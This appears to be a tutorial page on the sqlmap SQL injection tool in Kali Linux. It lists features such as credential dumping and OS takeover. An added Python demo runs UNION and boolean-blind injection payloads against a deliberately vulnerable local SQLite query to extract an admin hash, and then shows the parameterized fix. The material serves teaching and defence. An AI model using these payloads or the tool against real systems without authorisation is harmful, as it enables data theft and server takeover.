Sqlmap in Kali Linux
sqlmap Package Description
sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It includes a robust detection engine, many niche features for the experienced penetration tester, and a broad range of switches covering database fingerprinting, data retrieval from the database, access to the underlying file system, and execution of commands on the operating system via out-of-band connections.
sqlmap is written in Python, so it runs on any system with a Python interpreter. Its purpose is to find and exploit SQL injection vulnerabilities in web applications. Once it detects one or more injectable parameters on the target, the user can choose from a range of options: an extensive fingerprint of the back-end database management system, retrieval of the DBMS session user and current database, enumeration of users, password hashes, privileges and databases, dumping of entire tables or selected columns, execution of arbitrary SQL statements, reading of specific files from the file system, and more.
Features of Sqlmap
The following are the features of sqlmap:
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, Firebird, Sybase and SAP MaxDB, among other database management systems.
- Full support for the six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack.
- Support for privilege escalation of the database process' user through Metasploit's Meterpreter getsystem command.
- Support for connecting to the database directly, without going through SQL injection, by supplying DBMS credentials, IP address, port and database name.
- Support for establishing an out-of-band stateful TCP connection between the attacking machine and the operating system underlying the database server. Depending on the user's choice, this channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session.
- Support for downloading and uploading any file from or to the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support for executing arbitrary commands and retrieving their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support for searching across all databases for specific database names, tables or columns. This is useful for locating tables that hold a custom application's credentials, when the relevant column names contain strings such as name.
- Support for dumping whole database tables, a range of entries or selected columns, as the user chooses. The user can optionally dump only a range of characters from each column's entries.
- Support for enumerating users, password hashes, privileges, roles, databases, tables and columns.
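The techniques and enumeration switches listed above are easier to reason about against a concrete target. The following is an added example and is not code from the sqlmap project or from this page. It builds a throwaway SQLite database in memory (constructed sample data), exposes a deliberately vulnerable query that concatenates the p parameter the way an injectable forum page would, performs by hand what sqlmap's UNION query-based and boolean-based blind techniques automate (detection, table enumeration, credential dump), and then shows the parameterized query that defeats the same payloads. The function names, table layout and sample hash are assumptions of the example, not anything sqlmap itself uses.

```python
"""Added example: two of the six sqlmap techniques, done by hand against a
deliberately vulnerable SQLite-backed query, plus the parameterized fix.
Not part of the sqlmap project; schema and data are constructed."""
import sqlite3
import string

# Constructed sample data: a tiny forum schema with a credentials table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
INSERT INTO posts VALUES (1, 'Welcome'), (2, 'Rules');
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")

# Characters tried per position during blind extraction (assumed charset).
CHARSET = string.ascii_letters + string.digits + string.punctuation


def vulnerable_search(p):
    """Deliberately vulnerable: the ?p= value is concatenated into the SQL,
    which is the pattern sqlmap probes for. Returns the matching rows."""
    cur = conn.execute("SELECT id, title FROM posts WHERE id = " + str(p))
    return cur.fetchall()


def safe_search(p):
    """Hardened form: the value is bound as a parameter, so a payload is data.
    A numeric string such as '1' still matches; an injected string does not."""
    cur = conn.execute("SELECT id, title FROM posts WHERE id = ?", (p,))
    return cur.fetchall()


def detect_boolean_blind(search):
    """sqlmap-style check: a true condition must leave the response unchanged
    and a false condition must change it. True means the parameter is injectable."""
    baseline = search("1")
    return search("1 AND 1=1") == baseline and search("1 AND 1=2") != baseline


def union_dump(search, select_tail):
    """UNION query technique: append a SELECT with the same column count (two
    here) so its rows are returned inside the normal response."""
    return search(f"0 UNION SELECT {select_tail}")


def list_tables(search):
    """Analogue of sqlmap's --tables: read table names from sqlite_master."""
    rows = union_dump(search, "name, NULL FROM sqlite_master WHERE type='table' ORDER BY 1")
    return [name for name, _ in rows]


def blind_extract(search, subquery, charset=CHARSET, max_len=64):
    """Boolean-based blind technique: recover the string returned by
    `subquery` one character at a time, using only whether the response
    equals the baseline. unicode() avoids quoting the probed character;
    past the end of the string substr() is empty, unicode() is NULL and
    no probe matches, which terminates the loop."""
    baseline = search("1")
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"1 AND unicode(substr(({subquery}),{pos},1)) = {ord(ch)}"
            if search(probe) == baseline:
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_search), ("safe", safe_search)):
        print(f"[{name}] boolean-blind injectable:", detect_boolean_blind(fn))
        print(f"[{name}] tables via UNION:", list_tables(fn))
        print(f"[{name}] credentials via UNION:", union_dump(fn, "name, pass FROM users"))
        print(f"[{name}] admin hash via blind:",
              blind_extract(fn, "SELECT pass FROM users WHERE name='admin'"))
```

The blind extraction needs on the order of a few hundred to a few thousand requests for a 32-character hash, which is why sqlmap prefers the UNION and error-based techniques when they are available and falls back to blind techniques only when they are not. Against safe_search every payload is compared as a literal string against the integer id column, so detection fails and both extraction routines return nothing.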
sqlmap comes pre-installed on Kali Linux, a popular operating system among penetration testers. On other Debian-based Linux systems it can be installed from the distribution's package repositories with apt.
Tools Included in the sqlmap Package
sqlmap: automatic SQL injection tool
Sqlmap Usage Example
Given the target URL via -u (http://192.168.1.250/?p=1&forumaction=search), we can enumerate the database names with --dbs: